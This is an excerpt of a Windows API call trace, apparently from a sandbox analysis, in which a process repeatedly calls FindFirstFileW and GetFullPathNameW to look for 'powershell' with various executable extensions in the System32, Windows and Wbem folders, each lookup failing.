	[0771.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.287] SetErrorMode (uMode=0x1) returned 0x1
	[0771.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.287] SetErrorMode (uMode=0x1) returned 0x1
	[0771.287] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.287] SetErrorMode (uMode=0x1) returned 0x1
	[0771.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.288] SetErrorMode (uMode=0x1) returned 0x1
	[0771.288] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.288] SetErrorMode (uMode=0x1) returned 0x1
	[0771.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.288] SetErrorMode (uMode=0x1) returned 0x1
	[0771.289] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.289] SetErrorMode (uMode=0x1) returned 0x1
	[0771.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.289] SetErrorMode (uMode=0x1) returned 0x1
	[0771.289] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.290] SetErrorMode (uMode=0x1) returned 0x1
	[0771.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.290] SetErrorMode (uMode=0x1) returned 0x1
	[0771.290] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.290] SetErrorMode (uMode=0x1) returned 0x1
	[0771.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0771.291] SetErrorMode (uMode=0x1) returned 0x1
	[0771.291] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.291] SetErrorMode (uMode=0x1) returned 0x1
	[0771.291] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.291] SetErrorMode (uMode=0x1) returned 0x1
	[0771.291] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.292] SetErrorMode (uMode=0x1) returned 0x1
	[0771.292] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.292] SetErrorMode (uMode=0x1) returned 0x1
	[0771.292] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.292] SetErrorMode (uMode=0x1) returned 0x1
	[0771.293] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.293] SetErrorMode (uMode=0x1) returned 0x1
	[0771.293] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.293] SetErrorMode (uMode=0x1) returned 0x1
	[0771.293] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.293] SetErrorMode (uMode=0x1) returned 0x1
	[0771.293] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.294] SetErrorMode (uMode=0x1) returned 0x1
	[0771.294] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.294] SetErrorMode (uMode=0x1) returned 0x1
	[0771.294] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.294] SetErrorMode (uMode=0x1) returned 0x1
	[0771.295] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.295] SetErrorMode (uMode=0x1) returned 0x1
	[0771.295] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.295] SetErrorMode (uMode=0x1) returned 0x1
	[0771.295] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.295] SetErrorMode (uMode=0x1) returned 0x1
	[0771.296] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.296] SetErrorMode (uMode=0x1) returned 0x1
	[0771.296] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.296] SetErrorMode (uMode=0x1) returned 0x1
	[0771.296] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.296] SetErrorMode (uMode=0x1) returned 0x1
	[0771.297] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.297] SetErrorMode (uMode=0x1) returned 0x1
	[0771.297] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.297] SetErrorMode (uMode=0x1) returned 0x1
	[0771.297] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0771.298] SetErrorMode (uMode=0x1) returned 0x1
	[0771.298] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0771.298] SetErrorMode (uMode=0x1) returned 0x1
	[0772.960] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0772.960] SetErrorMode (uMode=0x1) returned 0x1
	[0772.960] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.960] SetErrorMode (uMode=0x1) returned 0x1
	[0772.960] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0772.961] SetErrorMode (uMode=0x1) returned 0x1
	[0772.961] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.961] SetErrorMode (uMode=0x1) returned 0x1
	[0772.961] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0772.961] SetErrorMode (uMode=0x1) returned 0x1
	[0772.961] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.962] SetErrorMode (uMode=0x1) returned 0x1
	[0772.962] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0772.962] SetErrorMode (uMode=0x1) returned 0x1
	[0772.962] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.962] SetErrorMode (uMode=0x1) returned 0x1
	[0772.963] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0772.963] SetErrorMode (uMode=0x1) returned 0x1
	[0772.963] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.963] SetErrorMode (uMode=0x1) returned 0x1
	[0772.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.963] SetErrorMode (uMode=0x1) returned 0x1
	[0772.964] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.964] SetErrorMode (uMode=0x1) returned 0x1
	[0772.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.964] SetErrorMode (uMode=0x1) returned 0x1
	[0772.964] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.964] SetErrorMode (uMode=0x1) returned 0x1
	[0772.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.965] SetErrorMode (uMode=0x1) returned 0x1
	[0772.965] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.965] SetErrorMode (uMode=0x1) returned 0x1
	[0772.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.966] SetErrorMode (uMode=0x1) returned 0x1
	[0772.966] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.966] SetErrorMode (uMode=0x1) returned 0x1
	[0772.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.966] SetErrorMode (uMode=0x1) returned 0x1
	[0772.966] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.967] SetErrorMode (uMode=0x1) returned 0x1
	[0772.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.967] SetErrorMode (uMode=0x1) returned 0x1
	[0772.967] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.967] SetErrorMode (uMode=0x1) returned 0x1
	[0772.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.968] SetErrorMode (uMode=0x1) returned 0x1
	[0772.968] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.968] SetErrorMode (uMode=0x1) returned 0x1
	[0772.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.968] SetErrorMode (uMode=0x1) returned 0x1
	[0772.969] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.969] SetErrorMode (uMode=0x1) returned 0x1
	[0772.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0772.969] SetErrorMode (uMode=0x1) returned 0x1
	[0772.969] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c6edc60 | out: lpFindFileData=0x1c6edc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0772.969] SetErrorMode (uMode=0x1) returned 0x1
	[0772.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6edac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
